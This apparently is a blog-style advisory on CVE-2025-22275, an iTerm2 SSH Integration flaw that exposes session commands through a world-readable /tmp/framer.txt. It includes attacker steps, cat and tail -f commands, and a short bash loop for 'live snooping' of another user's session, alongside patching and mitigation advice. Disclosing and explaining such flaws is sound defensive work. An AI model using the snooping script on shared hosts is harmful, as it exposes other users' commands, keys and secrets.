CVE-2025-22275 - iTerm2 Information Disclosure via /tmp/framer.txt Leak (Explained & Exploited)

Summary:
A new vulnerability in iTerm2—the popular terminal emulator for macOS—has been assigned CVE-2025-22275. Versions 3.5.6 through 3.5.10 (before 3.5.11) let remote attackers access sensitive information by reading the /tmp/framer.txt file. If you use iTerm2’s SSH Integration (often via it2ssh), and log into remote hosts with commonly installed Python, you may be at risk. Let’s break down how this works, who’s affected, and how an attacker could exploit it in practice.

What’s iTerm2 and What’s the Vulnerability?

iTerm2 is the terminal of choice for many Mac users. It’s packed with features—one being SSH Integration. With SSH Integration, iTerm2 makes remote sessions better by adding features like inline images, smarter text rendering, and more. To do this, it sometimes drops little helper scripts on your remote server. One of these scripts interacts with the /tmp/framer.txt file.

The Problem:
Many SSH sessions using iTerm2 write command logging or debugging information into /tmp/framer.txt. Unfortunately, this file is in a world-readable location (/tmp) and is not properly secured or cleaned up.

In layman’s terms:
Anyone on that server can read /tmp/framer.txt and see what you typed or ran in your iTerm2 session!

iTerm2 version 3.5.6, 3.5.7, 3.5.8, 3.5.9, and 3.5.10

- You use iTerm2’s SSH Integration (e.g., with it2ssh or direct features)

That host has Python installed (usually it does)

- Other (possibly unauthorized) users can log into this remote host and access /tmp/framer.txt

Good news:
Fixed in v3.5.11.

Exploit Details: How the Leak Happens

When iTerm2 connects via SSH and enables SSH Integration, it tries to set up communication with the remote shell using Python. A temporary file—/tmp/framer.txt—acts as a log or communication bridge.

The exploit takes advantage of the fact that

- /tmp/framer.txt is readable by any user on the system (typical with /tmp).
- If another user monitors this file, they can see the commands the iTerm2 session is running, or sometimes even command outputs.

Victim logs in to the server using iTerm2 (with SSH Integration enabled).

2. Victim runs sensitive commands—maybe cat ~/mysecrets.txt or enters a password.

Attacker logs in as a normal user (no sudo needed).

4. Attacker reads /tmp/framer.txt:

tail -f /tmp/framer.txt

If the timing is right, the attacker will see the victim’s keystrokes or commands show up in real time or can simply cat the file after the session.

The /tmp/framer.txt content might look like this (example)

2024-06-12 15:22:08 run: cat /home/user/.ssh/id_rsa
2024-06-12 15:22:11 run: nano /home/user/secrets.txt
2024-06-12 15:22:15 exit

An attacker simply runs

cat /tmp/framer.txt    # Or tail -f for real-time monitoring

Boom! Now the attacker knows what files you looked at or edited—including secret keys, passwords, or confidential project info.

Let’s automate reading /tmp/framer.txt for live snooping

#!/bin/bash
echo "[*] Watching for leaked iTerm2 commands via /tmp/framer.txt..."
while true; do
  if [ -f /tmp/framer.txt ]; then
    tail -f /tmp/framer.txt
    break
  else
    sleep 1
  fi
done

Run this as an unprivileged user while the victim starts their session.

Real-World Impact

- Leakage of usernames, filenames, commands, paths, and sometimes even content from sensitive files (if echoed or pasted).

Update iTerm2 to 3.5.11 or later!

Get the latest version
- As a sysadmin, you can set /tmp to be mounted as noexec,nosuid,nodev and use stricter umask by default. But really, the app fix is best.
- Avoid using SSH Integration on shared hosts, or remove /tmp/framer.txt after each session.

References & Further Info

- CVE-2025-22275 NVD page (pending details)
- iTerm2 Release Notes
- iTerm2 SSH Integration
- Discussion in iTerm2 Issue Tracker (search for "framer.txt" or "information disclosure")

Final Thoughts

CVE-2025-22275 is a good example of how convenience features (like SSH Integration) can open real security holes when not handled with care. If you use iTerm2 on shared hosts, update now and check your /tmp for leftovers. Don’t let your terminal become someone else’s data siphon!

*If you’d like to see more deep dives into terminal and SSH security, bookmark this blog!*

Timeline

Published on: 01/03/2025 05:15:08 UTC
Last modified on: 01/03/2025 07:15:25 UTC